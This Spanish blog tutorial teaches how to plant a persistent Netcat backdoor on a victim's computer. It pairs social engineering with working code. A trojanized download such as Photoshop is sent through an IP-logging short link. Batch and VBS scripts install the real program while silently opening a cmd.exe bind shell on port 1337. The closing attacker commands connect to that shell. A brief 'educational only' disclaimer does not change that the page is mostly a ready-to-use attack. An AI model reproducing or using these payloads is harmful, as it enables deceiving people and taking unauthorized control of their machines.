Instale una puerta trasera persistente de explotación mediante Netcat
Netcat es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos). Fue originalmente desarrollada por Hobbit en 1996 y liberada bajo una licencia de software libre permisiva (no copyleft, similar a BSD, MIT) para UNIX. Posteriormente fue portada a Windows y Mac OS X entre otras plataformas. Existen muchos forks de esta herramienta que añaden características nuevas como GNU Netcat o Cryptcat. wikipedia
Entre sus múltiples aplicaciones, es frecuente la depuración de aplicaciones de red. También es utilizada a menudo para abrir puertas traseras en un sistema.
Exploit remoto. Si utiliza una red de comunicaciones para entrar en contacto con el sistema víctima. Por ejemplo puede usar otro equipo dentro de la misma red interna o tener acceso desde la propia Internet.
Netcat descargar para windows
https://eternallybored.org/misc/netcat/
https://joncraton.org/files/nc111nt_safe.zip
https://joncraton.org/blog/46/netcat-for-windows/
Download nc111nt.zip (password:nc) - Netcat for Windows
Netcat descargar para linux
http://netcat.sourceforge.net/download.php
https://sectools.org/tool/netcat/
apt install nc
apt update
Netcat descargar para termux
pkg install git
pkg install sh
git clone https://github.com/Pericena/Exploits-Netcat.git
cd Exploits-Netcat
bash exploincat.sh
nc IP-de-la-victima 1337
Linea de comando
La línea básica de comandos para Netcat es nc [opciones] host puertos, donde host es la dirección IP que se desea analizar y puertos es o un determinado puerto o un rango de puertos o una serie de puertos separados por espacios. Echemos un vistazo a cada una de las opciones.
-help
-d Permite que nc trabaje en forma silenciosa y se desenganche del indicador de comandos MS-DOS.
-e
-i
-g
Se pueden especificar hasta 8 opciones –g en la línea de comandos para forzar que su tráfico nc pase por determinadas direcciones IP.
-G Esta opción le permitirá definir que dirección IP va a ser el siguiente salto dentro de la ruta indicada con la opción –g.
-l Activa el modo escucha de nc.
-L Activa el modo escucha de nc pero con más interés.
-n Indica a nc que no realice ninguna consulta de nombres de hosts.
-o
-p Le permite especificar el puerto local que va a utilizar nc.
-r Nc elegirá aleatoriamente los puertos locales y remotos.
-s Especifica la dirección IP de origen que deberá utilizar nc cuando efectue sus conexiones.
-t Es capaz de controlar la negociación de opciones Telnet.
-u Indica a nc que utilice UDP en lugar de TCP.
-v Informa el estado de nc, si pones otra –v podrás obtener más información.
-w
-z Le dice a nc que envíe la cantidad de datos necesarias para conocer en que puertos se está escuchando algo.⇜⇝⇜⇝⇜⇝⇜⇝
Ingeniería social
lo que aremos es hacerle creer a nuestra victima que le pasaremos un programa "x" ejemplo :photoshop ,hack ,ultraiso,vpn, otros programas . Todos los archivos deben ser subido en un servidor de almacenamiento , para lograr nuestro objetivo debemos ponerlo en un acortado de link llamados iplogger lo encontras en este link :) https://lpericena.blogspot.com/2019/09/grabify-geolocalizacion-traves-de-enlace.html enviar este link a la victima pero antes debemos acortar el link con iplogger https://www.mediafire.com/file/zc6z11ln09sv4ga/Programa.zip/file
Instalación victima
Una vez descarga los programas lo que ara el xploits sera instalar el programa real , pero mientras tanto se ejecutara el payloads en segundo plano abriendo un shell remota .
El comando que se ejecutara sera nc.exe -lvp 1337 -e cmd.exe
Código de payloads.exe
≪ °° ≫
@echo off
TITLE Remote
cls
cd programa
nc.exe -lvp 1337 -e cmd.exe
≪ °° ≫
payloads.exe nos permitirá abrir una puerta de enlace
Código de script.vbs
≪ °° ≫
Set WshShell=CreateObject("WScript.Shell")
WshShell.Run chr(34) & "payloads.exe" & Chr(34),0
Set WshShell=Nothing
≪ °° ≫
script.vbs nos permitira ejecutar el payloads en segundo plano
Código xploits.exe
≪ °° ≫
@echo off
TITLE install
cls
cd programa
start PSCS6.exe
start script.vbs
exit
≪ °° ≫
xploits.exe nos permitirá ejecutar el archivo vbs y exe
Observamos que nuestro expoits esta funcionando el programa photoshop funciona correctamente al igual que el script.vbs se ejecuta en segundo plano con el puerto 1337
Conexión atacante
Para este ataque necesitamos la ip de la victima como sabemos el puerto que usaremos sera 1337 , al usar el link de acortadores link aquí (0.0)=" https://lpericena.blogspot.com/2019/09/grabify-geolocalizacion-traves-de-enlace.html " podemos también obtener la ip del visitante en este caso seria la victima
En windows ejecutamos el nc.exe para poder introducir los datos o usar en la shell nc -n -v ip 1337
pero tenemos otra opción ejecutando xploitsnc.exe
En Linux introducimos en shell nc IP 1337 o ncat IP 1337 pero también tenemos otra opción usando un script en bash para poder ejecutar la tarea de conexión
En termux abrimos la app introducimos en nuestra terminal el comando nc IP 1337
De esa manera podemos tener acceso a un dispositivo
Conviértete en el mayor hacker del mundo Descarga gratis la app The Seven Codes y comparte
Google playSígueme
ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE.
NO ES RESPONSABLE DE NINGÚN TIPO DE PROBLEMA ILEGAL.
PERMANECE LEGAL.
GRACIAS!
Si tienes algún problema, deja un comentario y comparte tú opinión.
¿Ha quedado contestada su pregunta?
Mi nombre es Luishiño aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática..